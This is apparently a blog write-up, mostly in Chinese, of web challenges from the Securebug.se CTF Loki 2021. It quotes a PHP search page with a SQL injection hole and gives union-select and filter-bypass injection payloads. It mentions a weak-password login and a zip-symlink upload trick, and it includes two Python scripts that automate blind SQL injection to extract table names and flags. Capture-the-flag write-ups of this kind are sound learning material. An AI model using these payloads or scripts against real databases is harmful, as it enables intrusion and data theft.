npfs's blog

�Ὣ���¶�����

Securebug.se CTF Loki 2021

Securebug.se CTF Loki 2021 —web WriteUp

题目比较简单

Simple Login

查看源码

查看源码发现注释

1
<!-- <a href="?source">sauce</a> -->

访问: https://ch1.sbug.se/?source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
if (isset($_GET['q'])) {

$query = "SELECT * FROM websites WHERE title LIKE '%" . $_GET['q']. "%' OR description LIKE '%" . $_GET['q'] . "%' OR link LIKE '%" . $_GET['q'] . "%';";
$result = $conn->query($query);

echo "<h2>search '". htmlspecialchars($_GET['q']) . "' : results " . $result->num_rows . "</h2>";
?>
<?php
if (isset($result) && $result->num_rows > 0) {
echo "<hr/>";
echo "<br/>";

// output data of each row
while($row = $result->fetch_assoc()) {
echo "<div>";
echo "<a href='" . $row['link'] . "'><h2>" . htmlspecialchars($row['title']) . "</h2></a>";
echo "<p>" . htmlspecialchars($row['link']) . "</p>";
echo "<h5 style='color: #777;'>" . htmlspecialchars($row['description']) . "</h5></div>";
echo "<hr/>";
}
}
?>

payload:

‘ union select 1,2,password from secrets#

页面提示

Who let the robots out?

访问: https://ch27.sbug.se/robots.txt

得到提示

1
2
User-agent: *
Disallow: 007469e470d.php

访问: https://ch27.sbug.se/007469e470d.php

根据提示修改http头即可

Inception

查看源码发现注释

1
<!-- /?src -->

访问: https://ch24.sbug.se/?src

得到提示

preg_replace(“/select|union|from|where/i”, “”, @$_GET[“fname”]);

双写绕过即可

1
1' uniounionn selecselectt  group_concat(table_name),2,3 frofromm information_schema.tables whwhereere table_schema=database()#
1
1' uniounionn selecselectt  group_concat(column_name),2,3 frofromm information_schema.columns whwhereere table_name="inception_users"#
1
1' ununionion selselectect group_concat(passwd),2,3 frfromom inception_users#

Unzipper

目录扫描,存在后台地址: https://ch26.sbug.se/admin.php

弱密码 admin/admin 登入

根据提示,需要上传zip文件,想到软连接。[SWPU2019]Web3中有过类似的考点

不过这里的flag路径要写 /flag,不是/etc/flags

Ninja Blog

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import string
import requests

url = 'https://ch2.sbug.se/login.php'
s = string.digits + string.ascii_letters + string.punctuation
print(s)
payload = {
'username' : '',
'password' : 1
}
result = ''

username_template = "'admin'or/**/ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#"
#username_template = "admin'or/**/ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='blog_v2'),{0},1))={1}#"
#username_template = "admin'or/**/ascii(substr((select username from blog_v2 limit 2,1),{0},1))={1}#"

st = 0
for i in range(1,50):
st = 0
for c in s :
asc = ord(c)
payload['username'] = username_template.format(i,asc)
response = requests.post(url, data=payload)
print(response)
if "You are in, but your role is not admin" in response.text:
result += c
print('tables: ', result)
st = 1
if st == 0:
break
print('tables: ', result)

##jony

blacklist

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests
url = "https://ch23.sbug.se/?fname="
temp = {}
a = ""
for i in range(1,1000):
low = 32
high =128
mid = (low+high)//2
while (low<high):
#payload = "admin'%26%26({}<ascii(substr((select(database())),{},1)))%23".format(mid, i)
#payload="admin'%26%26if((ascii(substr((select(concat(table_name))from(information_schema.tables)where(table_schema='test')),{},1))>{}),1,0)%23".format(i, mid)
#payload = "admin'%26%26if((ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema='test')and(table_name='blacklist_users')),{},1))>{}),1,0)%23".format(i, mid)
payload = "admin'%26%26if((ascii(substr((select(group_concat(flag))from(blacklist_users)),{},1))>{}),1,0)%23".format(i, mid)
temp = {"id":payload}
r = requests.get(url + payload)
if "youtube" in r.text:
low = mid+1
else:
high = mid
mid =(low+high)//2
if(mid ==32 or mid ==127):
break
a +=chr(mid)
print(a)
print("password=",a)